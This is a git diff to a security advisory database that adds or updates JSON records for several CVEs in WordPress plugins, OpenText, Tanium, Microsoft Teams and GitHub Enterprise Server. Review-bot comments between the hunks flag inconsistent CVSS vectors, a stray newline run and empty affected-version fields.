 "nvd_published_at": "2026-02-19T09:16:18Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-cppf-28gj-rgc8/GHSA-cppf-28gj-rgc8.json b/advisories/unreviewed/2026/02/GHSA-cppf-28gj-rgc8/GHSA-cppf-28gj-rgc8.json
index 4ce9d97d0afbf..e06e9bac01fb0 100644
--- a/advisories/unreviewed/2026/02/GHSA-cppf-28gj-rgc8/GHSA-cppf-28gj-rgc8.json
+++ b/advisories/unreviewed/2026/02/GHSA-cppf-28gj-rgc8/GHSA-cppf-28gj-rgc8.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cppf-28gj-rgc8",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25311"
 ],
 "details": "Missing Authorization vulnerability in 10up Autoshare for Twitter autoshare-for-twitter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Autoshare for Twitter: from n/a through <= 2.3.1.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:15Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-fg7c-375r-xggv/GHSA-fg7c-375r-xggv.json b/advisories/unreviewed/2026/02/GHSA-fg7c-375r-xggv/GHSA-fg7c-375r-xggv.json
new file mode 100644
index 0000000000000..beea19a853e1a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fg7c-375r-xggv/GHSA-fg7c-375r-xggv.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fg7c-375r-xggv",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2025-9208"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in OpenText™ Web Site Management Server allows Stored XSS. The vulnerability could execute malicious scripts on the client side when the download query parameter is removed from the file URL, allowing attackers to compromise user sessions and data.\n\nThis issue affects Web Site Management Server: 16.7.X, 16.8, 16.8.1.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:D/RE:H/U:Red"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9208"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.opentext.com/csm/en?id=ot_kb_unauthenticated&sysparm_article=KB0854844"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-19T23:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fj3r-hwrr-xqfr/GHSA-fj3r-hwrr-xqfr.json b/advisories/unreviewed/2026/02/GHSA-fj3r-hwrr-xqfr/GHSA-fj3r-hwrr-xqfr.json
new file mode 100644
index 0000000000000..5e76bb063e8b9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fj3r-hwrr-xqfr/GHSA-fj3r-hwrr-xqfr.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fj3r-hwrr-xqfr",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2026-2350"
+ ],
+ "details": "Tanium addressed an insertion of sensitive information into log file vulnerability in Interact and TDS.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2350"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.tanium.com/TAN-2026-008"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T00:16:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fqr4-q363-g7gm/GHSA-fqr4-q363-g7gm.json b/advisories/unreviewed/2026/02/GHSA-fqr4-q363-g7gm/GHSA-fqr4-q363-g7gm.json
new file mode 100644
index 0000000000000..b37a08cf52988
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fqr4-q363-g7gm/GHSA-fqr4-q363-g7gm.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fqr4-q363-g7gm",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2025-13671"
+ ],
+ "details": "Cross-Site Request Forgery (CSRF) vulnerability in OpenText™ Web Site Management Server allows Cross Site Request Forgery. The vulnerability could make a user, with active session inside the product, click on a page that contains this malicious HTML triggering to perform changes unconsciously.\n\nThis issue affects Web Site Management Server: 16.7.0, 16.7.1.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:D/RE:H/U:Red"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13671"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.opentext.com/csm/en?id=ot_kb_unauthenticated&sysparm_article=KB0854846"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-19T23:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fv8p-2x46-62xh/GHSA-fv8p-2x46-62xh.json b/advisories/unreviewed/2026/02/GHSA-fv8p-2x46-62xh/GHSA-fv8p-2x46-62xh.json
index 9901ffe51d657..47f1a281eb1b3 100644
--- a/advisories/unreviewed/2026/02/GHSA-fv8p-2x46-62xh/GHSA-fv8p-2x46-62xh.json
+++ b/advisories/unreviewed/2026/02/GHSA-fv8p-2x46-62xh/GHSA-fv8p-2x46-62xh.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fv8p-2x46-62xh",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25321"
 ],
 "details": "Missing Authorization vulnerability in PSM Plugins SupportCandy supportcandy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SupportCandy: from n/a through <= 3.4.4.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:16Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-fw5x-26p7-22pv/GHSA-fw5x-26p7-22pv.json b/advisories/unreviewed/2026/02/GHSA-fw5x-26p7-22pv/GHSA-fw5x-26p7-22pv.json
index 06b5a4ffceccc..9143cd631403f 100644
--- a/advisories/unreviewed/2026/02/GHSA-fw5x-26p7-22pv/GHSA-fw5x-26p7-22pv.json
+++ b/advisories/unreviewed/2026/02/GHSA-fw5x-26p7-22pv/GHSA-fw5x-26p7-22pv.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fw5x-26p7-22pv",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25319"
 ],
 "details": "Cross-Site Request Forgery (CSRF) vulnerability in wpzita Zita Elementor Site Library zita-site-library allows Cross Site Request Forgery.This issue affects Zita Elementor Site Library: from n/a through <= 1.6.6.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-352"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:16Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-g6g2-qr88-w8qf/GHSA-g6g2-qr88-w8qf.json b/advisories/unreviewed/2026/02/GHSA-g6g2-qr88-w8qf/GHSA-g6g2-qr88-w8qf.json
index b49fe96911a14..0d9d496762c1a 100644
--- a/advisories/unreviewed/2026/02/GHSA-g6g2-qr88-w8qf/GHSA-g6g2-qr88-w8qf.json
+++ b/advisories/unreviewed/2026/02/GHSA-g6g2-qr88-w8qf/GHSA-g6g2-qr88-w8qf.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-g6g2-qr88-w8qf",
- "modified": "2026-02-19T18:31:51Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:51Z",
 "aliases": [
 "CVE-2026-23804"
 ],
 "details": "Missing Authorization vulnerability in BBR Plugins Better Business Reviews better-business-reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Better Business Reviews: from n/a through <= 0.1.1.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:13Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-hm7p-gwh2-3jfm/GHSA-hm7p-gwh2-3jfm.json b/advisories/unreviewed/2026/02/GHSA-hm7p-gwh2-3jfm/GHSA-hm7p-gwh2-3jfm.json
index 76d952dada47d..e18e5816cf70a 100644
--- a/advisories/unreviewed/2026/02/GHSA-hm7p-gwh2-3jfm/GHSA-hm7p-gwh2-3jfm.json
+++ b/advisories/unreviewed/2026/02/GHSA-hm7p-gwh2-3jfm/GHSA-hm7p-gwh2-3jfm.json
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hm7p-gwh2-3jfm", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25348" ], "details": "Missing Authorization vulnerability in alttextai Download Alt Text AI alttext-ai allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download Alt Text AI: from n/a through <= 1.10.15.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:18Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jwh4-2xr6-36qf/GHSA-jwh4-2xr6-36qf.json b/advisories/unreviewed/2026/02/GHSA-jwh4-2xr6-36qf/GHSA-jwh4-2xr6-36qf.json index 53851fad426db..894c7fa71e52e 100644 --- a/advisories/unreviewed/2026/02/GHSA-jwh4-2xr6-36qf/GHSA-jwh4-2xr6-36qf.json +++ b/advisories/unreviewed/2026/02/GHSA-jwh4-2xr6-36qf/GHSA-jwh4-2xr6-36qf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jwh4-2xr6-36qf", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-25000" ], "details": "Missing Authorization vulnerability in Kraft Plugins Wheel of Life wheel-of-life allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wheel of Life: from n/a through <= 1.2.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:13Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-m5w7-8p57-p7r3/GHSA-m5w7-8p57-p7r3.json b/advisories/unreviewed/2026/02/GHSA-m5w7-8p57-p7r3/GHSA-m5w7-8p57-p7r3.json index 141963a50a5a3..f028033f7d69b 100644 --- a/advisories/unreviewed/2026/02/GHSA-m5w7-8p57-p7r3/GHSA-m5w7-8p57-p7r3.json +++ b/advisories/unreviewed/2026/02/GHSA-m5w7-8p57-p7r3/GHSA-m5w7-8p57-p7r3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m5w7-8p57-p7r3", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25325" ], "details": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in rtCamp rtMedia for WordPress, BuddyPress and bbPress buddypress-media allows Retrieve Embedded Sensitive Data.This issue affects rtMedia for WordPress, BuddyPress and bbPress: from n/a through <= 4.7.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-497" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json index dcb5ba7c92618..99f0b7c0423c6 100644 --- a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json +++ b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p546-7whm-cxpm", - "modified": "2026-02-18T21:31:23Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-18T21:31:23Z", "aliases": [ "CVE-2026-0573" ], "details": "An URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. This vulnerability was reported via the GitHub Bug Bounty program.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json b/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json index 215dd0cf5c429..49934160ef248 100644 --- a/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json +++ b/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json 
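Review bot: The added `CVSS_V3` entry for GHSA-p546-7whm-cxpm disagrees with the `CVSS_V4` entry already in the same `severity` array: v3.1 says `UI:R`, `S:C` and `A:H`, while v4.0 says `UI:N`, `VA:N` and no subsequent-system impact (`SC:N/SI:N/SA:N`). A consumer that scores from one entry will triage this differently from one that reads the other, so the new line `"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"` should be checked against its source before it is relied on. GHSA-qrj7-4954-7p6v shows a smaller version of the same mismatch (`S:U` and `A:N` in v3.1 against `SC:L/SI:H` and `VA:L` in v4.0). The rest of the `severity` array and `database_specific` lie outside this hunk.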
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pmfh-36xp-5j94", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25314" ], "details": "Missing Authorization vulnerability in WP Messiah TOP Table Of Contents top-table-of-contents allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TOP Table Of Contents: from n/a through <= 1.3.31.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json index 300677a04c037..a9069aad439a0 100644 --- a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json +++ b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qrj7-4954-7p6v", - "modified": "2026-02-18T21:31:23Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-18T21:31:23Z", "aliases": [ "CVE-2026-1999" ], "details": "An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to merge their own pull request into a repository without having push access by exploiting an authorization bypass in the enable_auto_merge mutation for pull requests. This issue only affected repositories that allow forking as the attack relies on opening a pull request from an attacker-controlled fork into the target repository. Exploitation was only possible in specific scenarios. It required a clean pull request status and only applied to branches without branch protection rules enabled. This vulnerability affected GitHub Enterprise Server versions prior to 3.19.2, 3.18.5, and 3.17.11, and was fixed in versions 3.19.2, 3.18.5, and 3.17.11. This vulnerability was reported via the GitHub Bug Bounty program.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json new file mode 100644 index 0000000000000..c293e49d3b5a5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r4m5-gc42-8vvh",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2025-8055"
+ ],
+ "details": "Server-Side Request Forgery (SSRF) vulnerability in OpenText™ XM Fax allows Server Side Request Forgery. \n\nThe vulnerability could allow an attacker to\n\n\n\nperform blind SSRF to other systems accessible from the XM Fax server.\n\nThis issue affects XM Fax: 24.2.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:D/RE:M/U:Amber"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8055"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0847038"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-19T23:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json b/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json
index 5e7c2d3cb0772..8845ecb3b866e 100644
--- a/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json
+++ b/advisories/unreviewed/2026/02/GHSA-r7pc-wm4g-53rv/GHSA-r7pc-wm4g-53rv.json
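Review bot: The `details` string in GHSA-r4m5-gc42-8vvh carries a run of four `\n` escapes in the middle of a sentence (`an attacker to\n\n\n\nperform blind SSRF`), which renders as a broken paragraph wherever the advisory text is displayed. I would collapse that run to a single space so the sentence reads `could allow an attacker to perform blind SSRF to other systems accessible from the XM Fax server.` The record also carries only a `CVSS_V4` entry, so a consumer that reads `CVSS_V3` alone finds no vector here and is left with `database_specific.severity`.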
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r7pc-wm4g-53rv", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-27056" ], "details": "Missing Authorization vulnerability in StellarWP iThemes Sync ithemes-sync allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects iThemes Sync: from n/a through <= 3.2.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:26Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json b/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json new file mode 100644 index 0000000000000..1769c08ffd852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rx38-cw65-cmwp",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2026-21535"
+ ],
+ "details": "Improper access control in Microsoft Teams allows an unauthorized attacker to disclose information over a network.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21535"
+ },
+ {
+ "type": "WEB",
+ "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21535"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-19T23:16:24Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json b/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json
new file mode 100644
index 0000000000000..187b30ffa115c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9fg-2h32-5478", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-2435" + ], + "details": "Tanium addressed a SQL injection vulnerability in Asset.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2435" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json b/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json index 9ba5ef7049161..6575115526aed 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json +++ b/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xfv7-f3m9-5h58", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T00:31:52Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-25003" ], "details": "Missing Authorization vulnerability in madalin.ungureanu Client Portal client-portal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Client Portal: from n/a through <= 1.2.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:14Z" 
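Review bot: GHSA-w9fg-2h32-5478 gives a reader nothing to decide exposure with: `details` is the single sentence `Tanium addressed a SQL injection vulnerability in Asset.` with no version bound, and `affected` is `[]`. Until the record is enriched, the only usable source is the linked vendor page `https://security.tanium.com/TAN-2026-004`; I would at least extend `details` with the fixed versions taken from that page. The other new records in this patch (for example GHSA-rx38-cw65-cmwp) also ship an empty `affected`, so range-based matching will not flag any of them.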
